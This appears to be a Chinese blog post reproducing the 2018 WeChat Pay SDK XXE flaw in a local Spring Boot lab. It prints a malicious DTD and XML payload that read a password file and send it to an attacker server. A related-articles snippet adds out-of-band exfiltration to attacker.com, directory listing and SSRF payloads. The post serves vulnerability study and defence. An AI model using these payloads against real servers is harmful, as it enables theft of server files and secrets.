微信XXE漏洞复现

最新推荐文章于 2025-06-30 14:35:43 发布
最新推荐文章于 2025-06-30 14:35:43 发布
阅读量2.2k 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: 系统安全 文章标签: XXE 微信漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/xuechangchun007/article/details/80987330

7月4号微信SDK曝出漏洞,现在回现漏洞出现的过程,以下方式用JAVA 的SpringBoot实现。

强调:只是技术研究,不准用于非法途径。熟悉了这些漏洞才能让系统更健壮

有两个工程,一个是模拟商户端的server,有一个支持微信回调的接口;一个是攻击方的server,有一个可以接收请求的方法。

  1. 创建一个商家的springboot工程,端口8080
  2. 配置springboot可以访问静态文件,pom.xml中引入thymeleaf即可
<dependency>
	<groupId>org.springframework.boot</groupId>
	<artifactId>spring-boot-starter-web</artifactId>
</dependency>
<dependency>
	<groupId>org.springframework.boot</groupId>
	<artifactId>spring-boot-starter-thymeleaf</artifactId>
</dependency>
  1. 在resource下创建static/xxe.dtd,内容为
<!ENTITY % shell "<!ENTITY &#37; upload SYSTEM 'http://127.0.0.1:9080/attack/?file=%file;'> ">
%shell; 
%upload;

以上http地址是攻击者的服务器地址

  1. 以下是商家controller的代码
@RestController
@RequestMapping("/wxpay")
public class WxPayController {
    @PostMapping(value = "notify", consumes = "text/xml")
	public ResponseEntity wechatNotify(@RequestBody String notifyContent, HttpServletRequest request, HttpServletResponse response) {
		wxPayService.notifyAfterPay(notifyContent)
		return ResponseEntity.ok().build();
	}
}

wxPayService就是Wx sdk里面的WxPay的调用processResponseXml的方式,就是解析转换XML作用的

  1. 创建attach的工程,端口9080
  2. 创建接收攻击后请求的方法
@RestController
@RequestMapping("/attack")
public class AttackController {
    @RequestMapping("/")
	public void test(String file,HttpServletRequest req) {
		Map<String, String[]> parameterMap = req.getParameterMap();
		parameterMap.forEach((x,y) -> System.out.println("x:"+x+";y"+y));
	}
}

file就是上面xxe.dtd的请求。

  1. 在程序运行磁盘根目录下创建etc文件夹,password文件,就好比linux服务器的/etc/password
  2. 运行两个程序 访问8080的wxpay/notify,以下是body
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
	<!ENTITY % file SYSTEM "file:///etc/password">
	<!ENTITY % xxe SYSTEM "http://127.0.0.1:8080/xxe.dtd">
	%xxe;
]>

  1. 在attack的controller里面就可以看到file参数,就也是password里面的内容
  2. [https://www.cnblogs.com/tongwen/p/5194483.html]此文章很好的讲述了XXE攻击,感谢[www.cnblogs.com/kismetv/p/9266224.html]的作者
用友NC Cloud IUpdateService接口存在XXE漏洞
nnn2188185的博客
01-12 528
用友NC Cloud IUpdateService接口存在XXE漏洞
网络安全之XXE漏洞复现及防御(上篇)(技术进阶)
weixin_70911257的博客
04-16 1841
xxe漏洞复现
XXE漏洞复现
C233333235的博客
07-25 1321
XML外部实体注入(XML Extenrnal Entity Injection),简称XXE漏洞。引发XXE漏洞的主要原因是XML解析依赖库libxml默认开启了对外部实体的引用,导致服务端在解析用户提交的XML信息时未作处理直接进行解析,导致加载恶意的外部文件和代码,造成任意文件读取,命令执行(利用条件苛刻)内网扫描等危害在本篇 文章中我们使用pikachu靶场实现XXE漏洞复现
实战分享—微信小程序EDUSRC渗透漏洞复盘,黑客技术零基础入门到精通实战教程!
zz96405784848的博客
06-30 978
本文分享了一个微信小程序漏洞挖掘案例。首先通过分析登录数据包构造敏感接口,泄露了7000+用户的身份证、姓名、手机号等敏感信息。随后发现小程序存在未授权访问漏洞,通过修改参数成功获取全部用户数据。最后利用文件下载接口泄露用户身份证照片,可编写脚本批量获取。文章还提到微信小程序常见漏洞类型,包括SessionKey泄露、文件上传漏洞等,并提供了相关工具链接。整个过程展示了从数据包分析到漏洞利用的技术细节,对小程序安全测试具有参考价值。
微信支付SDK XXE漏洞 验证复现
热门推荐
u013224189的专栏
07-03 1万+
今天公司收到漏洞预警,微信支付SDK存在XXE漏洞,下载到本地验证了一下 漏洞信息来源 http://seclists.org/fulldisclosure/2018/Jul/3 https://xz.aliyun.com/t/2426 漏洞描述 微信支持提供了一个接口,供商家接收异步支付结果,微信支付所用的java sdk在处理结果时可能触发一个XXE漏洞,攻击者可以向这...
xxe简单漏洞复现
西部壮仔的博客
05-25 947
xml初识 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素 漏洞复现 php代码: <?php $xml = file_get_contents("php://input"); $data = simplexml_load_string($xml); echo "<pre>"; print_r($data); //注释掉该语句即为无回显的情
XML外部实体注入总结(XXE靶机复现)
Aiwin的博客
05-15 5613
XML外部实体注入,Vuln-XXE靶机复现和无回显XXE的使用
关于dom4j的微信XXE实体注入错误,使用DocumentHelper进行解析的漏洞修补
wtbapi的博客
07-06 5943
7月4日微信发来通知说存在XML实体注入漏洞,请修改。由于自己的后台采取的dom4j的包,而且当时业务也只是对微信传入的xml进行解析处理,所以就直接使用DocumentHelper的parseText的方式进行解析,而没有使用SAXReader的方式进行,在网上搜罗了很多资料,发现处理方式都无法使用。最后自己在看了dom4j的源代码后,发现DocumentHelper的parseText方法的实...
WEB漏洞——XXE
qq_63594215的博客
04-12 1614
本次文章主要介绍XXE漏洞的原理,利用以及防御的过程,另外还有介绍一点XML的基础知识,详情请见下文。a) xml,eXtensible Markup Language,可扩展标记语言,是一种标记语言,使用简单标记描述数据b) xml是一种非常灵活的语言,没有固定的标签,所有标签都可以自定义c) 通常,xml被用于信息的传递和记录,因此,xml经常被用于充当配置文件如果把HTML和XML进行对比的话,HTML进行对比的话,HTML旨在显示数据信息,而XML旨在用来进行数据的传输和存储。
eyoucms V1.0.4 后台任意文件读取漏洞1
08-03
它支持多平台访问,包括PC端、移动端以及微信平台。eyoucms以其简洁的操作界面和便捷的维护方式受到了用户的青睐。 #### 漏洞概述 在eyoucms V1.0.4版本中,发现了一个严重的安全问题——后台任意文件读取漏洞。该...
谈谈微信支付曝出的漏洞
小山博客
07-05 2544
一、背景        昨天(2018-07-04)微信支付的SDK曝出重大漏洞XXE漏洞),通过该漏洞,攻击者可以获取服务器中目录结构、文件内容,如代码、各种私钥等。获取这些信息以后,攻击者便可以为所欲为,其中就包括众多媒体所宣传的“0元也能买买买”。        漏洞报告地址:http://seclists.org/fulldisclosure/2018/Jul/3二、漏洞原理1.  XX...
XXE漏洞复现
weixin_45643931的博客
08-20 877
XXE漏洞 全称XML External Entity Injection即XML外部实体注入漏洞 由名字可以知道 这是关于XML的漏洞 SQL注入是在注入点处输入SQL恶意语法执行达到自己的目的 那么XXE应该也是类似的 在可以解析XML的地方(比如一个输入框等处)提交XML的恶意代码来执行 ⅩXE漏洞发生在应用序解析ⅩML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害 ...
XXE漏洞复现实操
wutiangui的博客
10-13 1069
(1)XXE漏洞全称XML External Entity Injection,即xmI外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害,XML(也是一种语言)被设计用来传输和存储数据。(2)也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致漏洞。如果能够建立连接,那么服务器端的ncat会收到相应的请求信息。
P4 利用XXE靶机 -XXE(XML外部实体注入漏洞复现
在下小黄的博客
03-22 661
大家好! 我是小黄,很高兴又跟大家见面啦 ! 拒绝水文,从我做起 !!!! 今天更新的是: P3 利用Vulnhub复现漏洞 - Apache SSI 远程命令执行漏洞 往期检索:程序设计学习笔记——目录 创建时间:2021年3月22日 软件: kali 2020.4 、Burp Suite Pro 、火狐浏览器 、XXE靶机 XXE漏洞复现环境准备 环境准备 kali配置 安装masscan : apt-get install masscan 安装gobuster: apt-g
xxe漏洞浅谈以及复现
weixin_51692662的博客
10-18 2071
xxe
解密XXE漏洞:原理剖析、复现与代码审计实战
congsec的博客
08-04 1227
在网络安全领域,XML外部实体(XXE漏洞因其隐蔽性和危害性而备受关注。随着企业对XML技术的广泛应用,XXE漏洞也逐渐成为攻击者们利用的重点目标。一个看似无害的XML文件,可能成为攻击者入侵系统的利器。因此,理解XXE漏洞的原理,并掌握其复现与代码审计技巧,对于提升系统安全性至关重要。本文将深入剖析XXE漏洞的工作原理,展示如何在实际环境中复现漏洞,并提供详尽的代码审计方法。无论您是网络安全初学者,还是资深开发者,都能从中获得实用的知识和技能。让我们一起解密XXE漏洞,提升我们的安全防护能力。
xxe漏洞原理,简单复现及防御
weixin_56513549的博客
04-11 1198
xxe漏洞原理 Web应用的脚本代码没有限制XML引入外部实体,从而导致测试者可以创建一个包含外部实体的XML,使得其中的内容会被服务器端执行 当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害 xxe联系靶场 http://web.jarvisoj.com:9882/ 复现步骤 打开代理进行抓包操作 明显看到使用的是json读取 我们将包放进重发模块修改成xml读取方式 读取flag包 <?xml versio..
漏洞复现xxe漏洞
千寻的博客
07-30 814
文章目录XXE-基础实验实验目的实验环境实验工具实验内容实验步骤1.访问目标进行注入攻击2.尝试进行登录,并进行抓包3.根据xxe注入漏洞,构造payloa免责声明 XXE-基础实验 实验目的 练习XXE(XML注入) 实验环境 目标机: windows2008 172.16.12.2 目标地址:http://172.16.12.2 实验工具 火狐浏览器:是一款非常稳定,非常流行的Internet浏览器 Burp Suite 实验内容 XXE(XML注入) 实验步骤 1.访问目标进行
XXE外部实体引入漏洞原理及复现
G3et的博客
02-26 951
XXE (XML 外部实体) 是一种安全漏洞,影响解析 XML 输入的应用程序。该漏洞允许攻击者在 XML 文档中注入外部实体, DTD 可以在 XML 文档中引用外部实体。如果 XML 解析器未正确验证外部实体的内容,攻击者可以利用 XXE 漏洞读取系统的机密数据,或者在恶意 DTD 文件中执行任意代码。当应用程序未能正确处理传入的 XML 数据或未限制可以处理的实体类型时,XXE 可能发生。因此,攻击者可以构造一个包含外部实体的恶意 XML 文档,该外部实体由脆弱的应用程序处理。
xxe漏洞复现
最新发布
07-30
### XXE(XML External Entity)漏洞复现步骤及利用示例 XXE(XML External Entity)漏洞通常出现在应用程序解析 XML 输入时,未正确处理外部实体引用,从而导致潜在的敏感数据泄露、服务器端请求伪造(SSRF)等攻击。以下是复现 XXE 漏洞的典型步骤及利用示例。 #### 1. 漏洞复现环境搭建 为了复现 XXE 漏洞,需准备一个能够解析 XML 并支持外部实体的解析器。例如,使用 Python 的 `xml.etree.ElementTree` 或 Java 的 `DocumentBuilderFactory` 等库。搭建一个简单的 Web 应用,接收 XML 输入并解析。 #### 2. 基础 XXE 利用示例 最基本的 XXE 攻击是通过定义外部实体读取本地文件。例如: ```xml <?xml version="1.0"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <root>&xxe;</root> ``` 当服务端解析该 XML 时,会读取 `/etc/passwd` 文件内容,并可能将其返回给攻击者[^4]。 #### 3. 带外数据(OOB)利用方式 在某些情况下,服务器不会直接返回解析结果,此时可以通过带外数据(Out-of-Band)方式将数据发送到攻击者控制的服务器。例如: ```xml <?xml version="1.0"?> <!DOCTYPE foo [ <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % remote SYSTEM "http://attacker.com/xxe?data=%file;"> %remote; ]> <root/> ``` 该 payload 会尝试读取 `/etc/passwd` 文件,并将其作为参数发送到攻击者控制的 `http://attacker.com/xxe`,从而实现数据窃取[^4]。 #### 4. XXE 目录遍历攻击 通过 XXE 漏洞,还可以尝试列出服务器上的目录内容。虽然实际中受限于文件系统权限,但理论上可以构造如下 payload: ```xml <!DOCTYPE test [ <!ENTITY % file SYSTEM "file:///etc/"> <!ENTITY % eval "<!ENTITY % directory SYSTEM 'file:///%file;'>"> %eval; %directory; ]> <test>&directory;</test> ``` 此 payload 会尝试读取 `/etc/` 目录内容,并通过外部实体将其内容外带[^1]。 #### 5. XXE 与 SSRF 结合攻击 XXE 还可用于 SSRF(Server Side Request Forgery)攻击,访问内网资源或远程服务器。例如: ```xml <?xml version="1.0"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://127.0.0.1:8080/internal-api"> ]> <root>&xxe;</root> ``` 此 payload 会向本地 `8080` 端口发起请求,获取内网服务的响应内容[^4]。 #### 6. XXE 修复建议 为了防止 XXE 漏洞,建议采取以下措施: - **禁用外部实体解析**:在 XML 解析器中禁用 DTD(Document Type Definitions)和外部实体。 - **使用安全的解析库**:避免使用易受攻击的 XML 解析器,改用 JSON 等更安全的数据格式。 - **输入验证与过滤**:对用户输入进行严格验证,拒绝包含 XML 特殊字符的输入。 - **最小权限原则**:确保运行 XML 解析器的进程使用最小权限账户,防止攻击者读取敏感文件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值